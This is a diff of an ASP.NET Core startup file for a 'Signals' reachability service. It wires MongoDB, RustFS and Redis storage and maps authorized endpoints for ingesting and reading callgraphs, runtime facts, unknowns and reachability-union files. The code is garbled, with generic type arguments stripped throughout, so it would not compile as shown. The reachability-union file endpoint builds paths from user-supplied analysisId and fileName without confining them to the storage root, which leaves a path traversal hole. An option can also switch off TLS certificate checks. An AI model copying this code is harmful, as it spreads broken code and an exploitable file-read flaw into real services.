- var inner = sp.GetRequiredService();
- var cache = sp.GetRequiredService();
- return new ReachabilityFactCacheDecorator(inner, cache);
-});
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
-builder.Services.AddSingleton();
+builder.Services.AddSingleton>(sp =>
+{
+ var opts = sp.GetRequiredService>().Value;
+ var database = sp.GetRequiredService();
+ var collection = database.GetCollection(opts.Mongo.CallgraphsCollection);
+ EnsureCallgraphIndexes(collection);
+ return collection;
+});
+
+builder.Services.AddSingleton>(sp =>
+{
+ var opts = sp.GetRequiredService>().Value;
+ var database = sp.GetRequiredService();
+ var collection = database.GetCollection(opts.Mongo.ReachabilityFactsCollection);
+ EnsureReachabilityFactIndexes(collection);
+ return collection;
+});
+
+builder.Services.AddSingleton>(sp =>
+{
+ var opts = sp.GetRequiredService>().Value;
+ var database = sp.GetRequiredService();
+ var collection = database.GetCollection(opts.Mongo.UnknownsCollection);
+ EnsureUnknownsIndexes(collection);
+ return collection;
+});
+
+builder.Services.AddSingleton();
+
+// Configure callgraph artifact storage based on driver
+if (bootstrap.Storage.IsRustFsDriver())
+{
+ // Configure HttpClient for RustFS
+ builder.Services.AddHttpClient(RustFsCallgraphArtifactStore.HttpClientName, (sp, client) =>
+ {
+ var opts = sp.GetRequiredService>().Value;
+ client.Timeout = opts.Storage.RustFs.Timeout;
+ })
+ .ConfigurePrimaryHttpMessageHandler(sp =>
+ {
+ var opts = sp.GetRequiredService>().Value;
+ var handler = new HttpClientHandler();
+ if (opts.Storage.RustFs.AllowInsecureTls)
+ {
+ handler.ServerCertificateCustomValidationCallback = HttpClientHandler.DangerousAcceptAnyServerCertificateValidator;
+ }
+ return handler;
+ });
+
+ builder.Services.AddSingleton();
+}
+else
+{
+ builder.Services.AddSingleton();
+}
+
+builder.Services.AddSingleton(new SimpleJsonCallgraphParser("java"));
+builder.Services.AddSingleton(new SimpleJsonCallgraphParser("nodejs"));
+builder.Services.AddSingleton(new SimpleJsonCallgraphParser("python"));
+builder.Services.AddSingleton(new SimpleJsonCallgraphParser("go"));
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton(sp =>
+{
+ var options = sp.GetRequiredService>().Value;
+ return new RedisReachabilityCache(options.Cache);
+});
+builder.Services.AddSingleton();
+builder.Services.AddSingleton(sp =>
+{
+ var inner = sp.GetRequiredService();
+ var cache = sp.GetRequiredService();
+ return new ReachabilityFactCacheDecorator(inner, cache);
+});
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
+builder.Services.AddSingleton();
if (bootstrap.Authority.Enabled)
{
@@ -216,471 +245,471 @@ app.UseAuthentication();
app.UseAuthorization();
app.MapHealthChecks("/healthz").AllowAnonymous();
-app.MapGet("/readyz", (SignalsStartupState state, SignalsSealedModeMonitor sealedModeMonitor) =>
-{
- if (!sealedModeMonitor.IsCompliant(out var reason))
- {
- return Results.Json(
- new { status = "sealed-mode-blocked", reason },
- statusCode: StatusCodes.Status503ServiceUnavailable);
- }
-
- return state.IsReady
- ? Results.Ok(new { status = "ready" })
- : Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
-}).AllowAnonymous();
+app.MapGet("/readyz", (SignalsStartupState state, SignalsSealedModeMonitor sealedModeMonitor) =>
+{
+ if (!sealedModeMonitor.IsCompliant(out var reason))
+ {
+ return Results.Json(
+ new { status = "sealed-mode-blocked", reason },
+ statusCode: StatusCodes.Status503ServiceUnavailable);
+ }
-var signalsGroup = app.MapGroup("/signals");
-
-signalsGroup.MapGet("/ping", (HttpContext context, SignalsOptions options, SignalsSealedModeMonitor sealedModeMonitor) =>
-{
- if (!Program.TryAuthorize(context, requiredScope: SignalsPolicies.Read, fallbackAllowed: options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- return Results.NoContent();
-}).WithName("SignalsPing");
+ return state.IsReady
+ ? Results.Ok(new { status = "ready" })
+ : Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+}).AllowAnonymous();
-signalsGroup.MapGet("/status", (HttpContext context, SignalsOptions options, SignalsSealedModeMonitor sealedModeMonitor) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var failure))
- {
- return failure ?? Results.Unauthorized();
- }
-
- var sealedCompliant = sealedModeMonitor.IsCompliant(out var sealedReason);
- return Results.Ok(new
- {
- service = "signals",
- version = typeof(Program).Assembly.GetName().Version?.ToString() ?? "unknown",
- sealedMode = new
- {
- enforced = sealedModeMonitor.EnforcementEnabled,
- compliant = sealedCompliant,
- reason = sealedCompliant ? null : sealedReason
- }
- });
-}).WithName("SignalsStatus");
+var signalsGroup = app.MapGroup("/signals");
+
+signalsGroup.MapGet("/ping", (HttpContext context, SignalsOptions options, SignalsSealedModeMonitor sealedModeMonitor) =>
+{
+ if (!Program.TryAuthorize(context, requiredScope: SignalsPolicies.Read, fallbackAllowed: options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ return Results.NoContent();
+}).WithName("SignalsPing");
+
+signalsGroup.MapGet("/status", (HttpContext context, SignalsOptions options, SignalsSealedModeMonitor sealedModeMonitor) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var failure))
+ {
+ return failure ?? Results.Unauthorized();
+ }
+
+ var sealedCompliant = sealedModeMonitor.IsCompliant(out var sealedReason);
+ return Results.Ok(new
+ {
+ service = "signals",
+ version = typeof(Program).Assembly.GetName().Version?.ToString() ?? "unknown",
+ sealedMode = new
+ {
+ enforced = sealedModeMonitor.EnforcementEnabled,
+ compliant = sealedCompliant,
+ reason = sealedCompliant ? null : sealedReason
+ }
+ });
+}).WithName("SignalsStatus");
+
+signalsGroup.MapPost("/callgraphs", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ CallgraphIngestRequest request,
+ ICallgraphIngestionService ingestionService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ try
+ {
+ var result = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
+ return Results.Accepted($"/signals/callgraphs/{result.CallgraphId}", result);
+ }
+ catch (CallgraphIngestionValidationException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+ catch (CallgraphParserNotFoundException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+ catch (CallgraphParserValidationException ex)
+ {
+ return Results.UnprocessableEntity(new { error = ex.Message });
+ }
+ catch (FormatException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+}).WithName("SignalsCallgraphIngest");
+
+signalsGroup.MapGet("/callgraphs/{callgraphId}", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string callgraphId,
+ ICallgraphRepository callgraphRepository,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(callgraphId))
+ {
+ return Results.BadRequest(new { error = "callgraphId is required." });
+ }
+
+ var document = await callgraphRepository.GetByIdAsync(callgraphId.Trim(), cancellationToken).ConfigureAwait(false);
+ return document is null ? Results.NotFound() : Results.Ok(document);
+}).WithName("SignalsCallgraphGet");
+
+signalsGroup.MapGet("/callgraphs/{callgraphId}/manifest", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string callgraphId,
+ ICallgraphRepository callgraphRepository,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(callgraphId))
+ {
+ return Results.BadRequest(new { error = "callgraphId is required." });
+ }
+
+ var document = await callgraphRepository.GetByIdAsync(callgraphId.Trim(), cancellationToken).ConfigureAwait(false);
+ if (document is null || string.IsNullOrWhiteSpace(document.Artifact.ManifestPath))
+ {
+ return Results.NotFound();
+ }
+
+ var manifestPath = Path.Combine(options.Storage.RootPath, document.Artifact.ManifestPath);
+ if (!File.Exists(manifestPath))
+ {
+ return Results.NotFound(new { error = "manifest not found" });
+ }
+
+ var bytes = await File.ReadAllBytesAsync(manifestPath, cancellationToken).ConfigureAwait(false);
+ return Results.File(bytes, "application/json");
+}).WithName("SignalsCallgraphManifestGet");
+
+signalsGroup.MapPost("/runtime-facts", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ RuntimeFactsIngestRequest request,
+ IRuntimeFactsIngestionService ingestionService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ try
+ {
+ var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
+ return Results.Accepted($"/signals/runtime-facts/{response.SubjectKey}", response);
+ }
+ catch (RuntimeFactsValidationException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+}).WithName("SignalsRuntimeIngest");
+
+signalsGroup.MapPost("/reachability/union", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ [FromHeader(Name = "X-Analysis-Id")] string? analysisId,
+ IReachabilityUnionIngestionService ingestionService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ var id = string.IsNullOrWhiteSpace(analysisId) ? Guid.NewGuid().ToString("N") : analysisId.Trim();
+
+ if (!string.Equals(context.Request.ContentType, "application/zip", StringComparison.OrdinalIgnoreCase))
+ {
+ return Results.BadRequest(new { error = "Content-Type must be application/zip" });
+ }
+
+ try
+ {
+ var response = await ingestionService.IngestAsync(id, context.Request.Body, cancellationToken).ConfigureAwait(false);
+ return Results.Accepted($"/signals/reachability/union/{response.AnalysisId}/meta", response);
+ }
+ catch (Exception ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+}).WithName("SignalsReachabilityUnionIngest");
+
+signalsGroup.MapGet("/reachability/union/{analysisId}/meta", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string analysisId,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(analysisId))
+ {
+ return Results.BadRequest(new { error = "analysisId is required." });
+ }
+
+ var path = Path.Combine(options.Storage.RootPath, "reachability_graphs", analysisId.Trim(), "meta.json");
+ if (!File.Exists(path))
+ {
+ return Results.NotFound();
+ }
+
+ var bytes = await File.ReadAllBytesAsync(path, cancellationToken).ConfigureAwait(false);
+ return Results.File(bytes, "application/json");
+}).WithName("SignalsReachabilityUnionMeta");
+
+signalsGroup.MapGet("/reachability/union/{analysisId}/files/{fileName}", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string analysisId,
+ string fileName,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(analysisId) || string.IsNullOrWhiteSpace(fileName))
+ {
+ return Results.BadRequest(new { error = "analysisId and fileName are required." });
+ }
+
+ var root = Path.Combine(options.Storage.RootPath, "reachability_graphs", analysisId.Trim());
+ var path = Path.Combine(root, fileName.Replace('/', Path.DirectorySeparatorChar));
+ if (!File.Exists(path))
+ {
+ return Results.NotFound();
+ }
+
+ var contentType = fileName.EndsWith(".json", StringComparison.OrdinalIgnoreCase) ? "application/json" : "application/x-ndjson";
+ var bytes = await File.ReadAllBytesAsync(path, cancellationToken).ConfigureAwait(false);
+ return Results.File(bytes, contentType);
+}).WithName("SignalsReachabilityUnionFile");
+
+signalsGroup.MapPost("/runtime-facts/ndjson", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ [AsParameters] RuntimeFactsStreamMetadata metadata,
+ IRuntimeFactsIngestionService ingestionService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (metadata is null || string.IsNullOrWhiteSpace(metadata.CallgraphId))
+ {
+ return Results.BadRequest(new { error = "callgraphId is required." });
+ }
+
+ var subject = metadata.ToSubject();
+
+ var isGzip = string.Equals(context.Request.Headers.ContentEncoding, "gzip", StringComparison.OrdinalIgnoreCase);
+ var events = await RuntimeFactsNdjsonReader.ReadAsync(context.Request.Body, isGzip, cancellationToken).ConfigureAwait(false);
+ if (events.Count == 0)
+ {
+ return Results.BadRequest(new { error = "runtime fact stream was empty." });
+ }
+
+ var request = new RuntimeFactsIngestRequest
+ {
+ Subject = subject,
+ CallgraphId = metadata.CallgraphId,
+ Events = events
+ };
+
+ try
+ {
+ var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
+ return Results.Accepted($"/signals/runtime-facts/{response.SubjectKey}", response);
+ }
+ catch (RuntimeFactsValidationException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+}).WithName("SignalsRuntimeIngestNdjson");
+
+signalsGroup.MapGet("/facts/{subjectKey}", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string subjectKey,
+ IReachabilityFactRepository factRepository,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(subjectKey))
+ {
+ return Results.BadRequest(new { error = "subjectKey is required." });
+ }
+
+ var fact = await factRepository.GetBySubjectAsync(subjectKey.Trim(), cancellationToken).ConfigureAwait(false);
+ return fact is null ? Results.NotFound() : Results.Ok(fact);
+}).WithName("SignalsFactsGet");
+
+signalsGroup.MapPost("/unknowns", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ UnknownsIngestRequest request,
+ IUnknownsIngestionService ingestionService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ try
+ {
+ var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
+ return Results.Accepted($"/signals/unknowns/{response.SubjectKey}", response);
+ }
+ catch (UnknownsValidationException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+}).WithName("SignalsUnknownsIngest");
+
+signalsGroup.MapGet("/unknowns/{subjectKey}", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ string subjectKey,
+ IUnknownsRepository repository,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ if (string.IsNullOrWhiteSpace(subjectKey))
+ {
+ return Results.BadRequest(new { error = "subjectKey is required." });
+ }
+
+ var items = await repository.GetBySubjectAsync(subjectKey.Trim(), cancellationToken).ConfigureAwait(false);
+ return items.Count == 0 ? Results.NotFound() : Results.Ok(items);
+}).WithName("SignalsUnknownsGet");
+
+signalsGroup.MapPost("/reachability/recompute", async Task (
+ HttpContext context,
+ SignalsOptions options,
+ ReachabilityRecomputeRequest request,
+ IReachabilityScoringService scoringService,
+ SignalsSealedModeMonitor sealedModeMonitor,
+ CancellationToken cancellationToken) =>
+{
+ if (!Program.TryAuthorize(context, SignalsPolicies.Admin, options.Authority.AllowAnonymousFallback, out var authFailure))
+ {
+ return authFailure ?? Results.Unauthorized();
+ }
+
+ if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
+ {
+ return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
+ }
+
+ try
+ {
+ var fact = await scoringService.RecomputeAsync(request, cancellationToken).ConfigureAwait(false);
+ return Results.Ok(new
+ {
+ fact.Id,
+ fact.CallgraphId,
+ subject = fact.Subject,
+ fact.EntryPoints,
+ fact.States,
+ fact.ComputedAt
+ });
+ }
+ catch (ReachabilityScoringValidationException ex)
+ {
+ return Results.BadRequest(new { error = ex.Message });
+ }
+ catch (ReachabilityCallgraphNotFoundException ex)
+ {
+ return Results.NotFound(new { error = ex.Message });
+ }
+}).WithName("SignalsReachabilityRecompute");
-signalsGroup.MapPost("/callgraphs", async Task (
- HttpContext context,
- SignalsOptions options,
- CallgraphIngestRequest request,
- ICallgraphIngestionService ingestionService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- try
- {
- var result = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
- return Results.Accepted($"/signals/callgraphs/{result.CallgraphId}", result);
- }
- catch (CallgraphIngestionValidationException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
- catch (CallgraphParserNotFoundException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
- catch (CallgraphParserValidationException ex)
- {
- return Results.UnprocessableEntity(new { error = ex.Message });
- }
- catch (FormatException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
-}).WithName("SignalsCallgraphIngest");
-
-signalsGroup.MapGet("/callgraphs/{callgraphId}", async Task (
- HttpContext context,
- SignalsOptions options,
- string callgraphId,
- ICallgraphRepository callgraphRepository,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(callgraphId))
- {
- return Results.BadRequest(new { error = "callgraphId is required." });
- }
-
- var document = await callgraphRepository.GetByIdAsync(callgraphId.Trim(), cancellationToken).ConfigureAwait(false);
- return document is null ? Results.NotFound() : Results.Ok(document);
-}).WithName("SignalsCallgraphGet");
-
-signalsGroup.MapGet("/callgraphs/{callgraphId}/manifest", async Task (
- HttpContext context,
- SignalsOptions options,
- string callgraphId,
- ICallgraphRepository callgraphRepository,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(callgraphId))
- {
- return Results.BadRequest(new { error = "callgraphId is required." });
- }
-
- var document = await callgraphRepository.GetByIdAsync(callgraphId.Trim(), cancellationToken).ConfigureAwait(false);
- if (document is null || string.IsNullOrWhiteSpace(document.Artifact.ManifestPath))
- {
- return Results.NotFound();
- }
-
- var manifestPath = Path.Combine(options.Storage.RootPath, document.Artifact.ManifestPath);
- if (!File.Exists(manifestPath))
- {
- return Results.NotFound(new { error = "manifest not found" });
- }
-
- var bytes = await File.ReadAllBytesAsync(manifestPath, cancellationToken).ConfigureAwait(false);
- return Results.File(bytes, "application/json");
-}).WithName("SignalsCallgraphManifestGet");
-
-signalsGroup.MapPost("/runtime-facts", async Task (
- HttpContext context,
- SignalsOptions options,
- RuntimeFactsIngestRequest request,
- IRuntimeFactsIngestionService ingestionService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- try
- {
- var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
- return Results.Accepted($"/signals/runtime-facts/{response.SubjectKey}", response);
- }
- catch (RuntimeFactsValidationException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
-}).WithName("SignalsRuntimeIngest");
-
-signalsGroup.MapPost("/reachability/union", async Task (
- HttpContext context,
- SignalsOptions options,
- [FromHeader(Name = "X-Analysis-Id")] string? analysisId,
- IReachabilityUnionIngestionService ingestionService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- var id = string.IsNullOrWhiteSpace(analysisId) ? Guid.NewGuid().ToString("N") : analysisId.Trim();
-
- if (!string.Equals(context.Request.ContentType, "application/zip", StringComparison.OrdinalIgnoreCase))
- {
- return Results.BadRequest(new { error = "Content-Type must be application/zip" });
- }
-
- try
- {
- var response = await ingestionService.IngestAsync(id, context.Request.Body, cancellationToken).ConfigureAwait(false);
- return Results.Accepted($"/signals/reachability/union/{response.AnalysisId}/meta", response);
- }
- catch (Exception ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
-}).WithName("SignalsReachabilityUnionIngest");
-
-signalsGroup.MapGet("/reachability/union/{analysisId}/meta", async Task (
- HttpContext context,
- SignalsOptions options,
- string analysisId,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(analysisId))
- {
- return Results.BadRequest(new { error = "analysisId is required." });
- }
-
- var path = Path.Combine(options.Storage.RootPath, "reachability_graphs", analysisId.Trim(), "meta.json");
- if (!File.Exists(path))
- {
- return Results.NotFound();
- }
-
- var bytes = await File.ReadAllBytesAsync(path, cancellationToken).ConfigureAwait(false);
- return Results.File(bytes, "application/json");
-}).WithName("SignalsReachabilityUnionMeta");
-
-signalsGroup.MapGet("/reachability/union/{analysisId}/files/{fileName}", async Task (
- HttpContext context,
- SignalsOptions options,
- string analysisId,
- string fileName,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(analysisId) || string.IsNullOrWhiteSpace(fileName))
- {
- return Results.BadRequest(new { error = "analysisId and fileName are required." });
- }
-
- var root = Path.Combine(options.Storage.RootPath, "reachability_graphs", analysisId.Trim());
- var path = Path.Combine(root, fileName.Replace('/', Path.DirectorySeparatorChar));
- if (!File.Exists(path))
- {
- return Results.NotFound();
- }
-
- var contentType = fileName.EndsWith(".json", StringComparison.OrdinalIgnoreCase) ? "application/json" : "application/x-ndjson";
- var bytes = await File.ReadAllBytesAsync(path, cancellationToken).ConfigureAwait(false);
- return Results.File(bytes, contentType);
-}).WithName("SignalsReachabilityUnionFile");
-
-signalsGroup.MapPost("/runtime-facts/ndjson", async Task (
- HttpContext context,
- SignalsOptions options,
- [AsParameters] RuntimeFactsStreamMetadata metadata,
- IRuntimeFactsIngestionService ingestionService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Write, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (metadata is null || string.IsNullOrWhiteSpace(metadata.CallgraphId))
- {
- return Results.BadRequest(new { error = "callgraphId is required." });
- }
-
- var subject = metadata.ToSubject();
-
- var isGzip = string.Equals(context.Request.Headers.ContentEncoding, "gzip", StringComparison.OrdinalIgnoreCase);
- var events = await RuntimeFactsNdjsonReader.ReadAsync(context.Request.Body, isGzip, cancellationToken).ConfigureAwait(false);
- if (events.Count == 0)
- {
- return Results.BadRequest(new { error = "runtime fact stream was empty." });
- }
-
- var request = new RuntimeFactsIngestRequest
- {
- Subject = subject,
- CallgraphId = metadata.CallgraphId,
- Events = events
- };
-
- try
- {
- var response = await ingestionService.IngestAsync(request, cancellationToken).ConfigureAwait(false);
- return Results.Accepted($"/signals/runtime-facts/{response.SubjectKey}", response);
- }
- catch (RuntimeFactsValidationException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
-}).WithName("SignalsRuntimeIngestNdjson");
-
-signalsGroup.MapGet("/facts/{subjectKey}", async Task (
- HttpContext context,
- SignalsOptions options,
- string subjectKey,
- IReachabilityFactRepository factRepository,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
